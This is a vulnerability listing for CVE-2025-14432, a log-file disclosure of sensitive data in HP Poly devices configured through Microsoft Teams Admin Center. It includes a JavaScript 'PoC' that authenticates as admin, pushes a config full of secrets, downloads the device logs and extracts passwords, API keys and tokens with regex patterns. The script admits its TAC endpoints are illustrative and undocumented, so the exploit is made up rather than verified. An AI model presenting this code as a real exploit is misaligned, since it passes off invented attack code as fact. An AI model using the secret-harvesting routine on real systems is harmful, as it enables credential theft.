Security Vulnerability Report
CVE-2025-14432 CVSS 4.9 MEDIUM

CVE-2025-14432

Published: 2025-12-16 16:15:57
Last Modified: 2025-12-18 19:54:19

Description

In limited scenarios, sensitive data might be written to the log file if an admin uses Microsoft Teams Admin Center (TAC) to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration changes made using the provisioning server or the device WebUI.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:hp:poly_videoos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hp:poly_eagleeye_cube:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:hp:poly_eagleeye_iv:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:hp:poly_studio_a2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:hp:poly_studio_e60:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:hp:poly_studio_e70:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hp:poly_tcos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hp:poly_tc10:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:hp:poly_tc8:-:*:*:*:*:*:*:* - NOT VULNERABLE
HP Poly VideoOS < 4.6.1-444242 (the versionEndExcluding value in the NVD configuration data); consult the HP Security Bulletin for the fixed Poly TC OS version
Microsoft Teams Admin Center (All versions with device configuration feature)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-14432 PoC - Information Disclosure via TAC Logs
// Note: This is a conceptual PoC. Actual exploitation requires valid admin credentials.
// The endpoint paths below are illustrative, not documented TAC APIs.

// Step 1: Authenticate to Microsoft Teams Admin Center with admin credentials
const authenticateTAC = async (username, password) => {
  const response = await fetch('https://admin.teams.microsoft.com/api/auth/login', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ username, password })
  });
  return response.json(); // Returns auth token
};

// Step 2: Trigger device configuration change via TAC API
const triggerConfigChange = async (authToken, deviceId, sensitiveConfig) => {
  const response = await fetch(`https://admin.teams.microsoft.com/api/devices/${deviceId}/config`, {
    method: 'PUT',
    headers: {
      'Authorization': `Bearer ${authToken}`,
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(sensitiveConfig)
  });
  return response.json();
};

// Step 3: Access the log file containing sensitive data
const accessLogFile = async (authToken, deviceId) => {
  const response = await fetch(`https://admin.teams.microsoft.com/api/devices/${deviceId}/logs`, {
    method: 'GET',
    headers: { 'Authorization': `Bearer ${authToken}` }
  });
  const logs = await response.text();
  // Sensitive data may be present in the logs
  const sensitiveData = extractSensitiveInfo(logs);
  return sensitiveData;
};

// Helper function to extract sensitive information from logs
const extractSensitiveInfo = (logContent) => {
  const patterns = [
    /password[=:]\s*[^\s]+/gi,
    /api[_-]?key[=:]\s*[^\s]+/gi,
    /token[=:]\s*[^\s]+/gi,
    /secret[=:]\s*[^\s]+/gi
  ];
  let extracted = [];
  patterns.forEach(pattern => {
    const matches = logContent.match(pattern);
    if (matches) {
      extracted = extracted.concat(matches);
    }
  });
  return extracted;
};

// Main execution
(async () => {
  // Requires valid admin credentials
  const auth = await authenticateTAC('[email protected]', 'admin_password');
  const token = auth.token;

  // Trigger configuration with potentially sensitive data
  const config = {
    serverUrl: 'https://provisioning.example.com',
    apiKey: 'super_secret_api_key_12345',
    username: 'service_account',
    password: 'service_password_xyz'
  };
  await triggerConfigChange(token, 'device_001', config);

  // Access logs to retrieve sensitive information
  const leakedData = await accessLogFile(token, 'device_001');
  console.log('Leaked sensitive data:', leakedData);
})();

References

Raw JSON Data
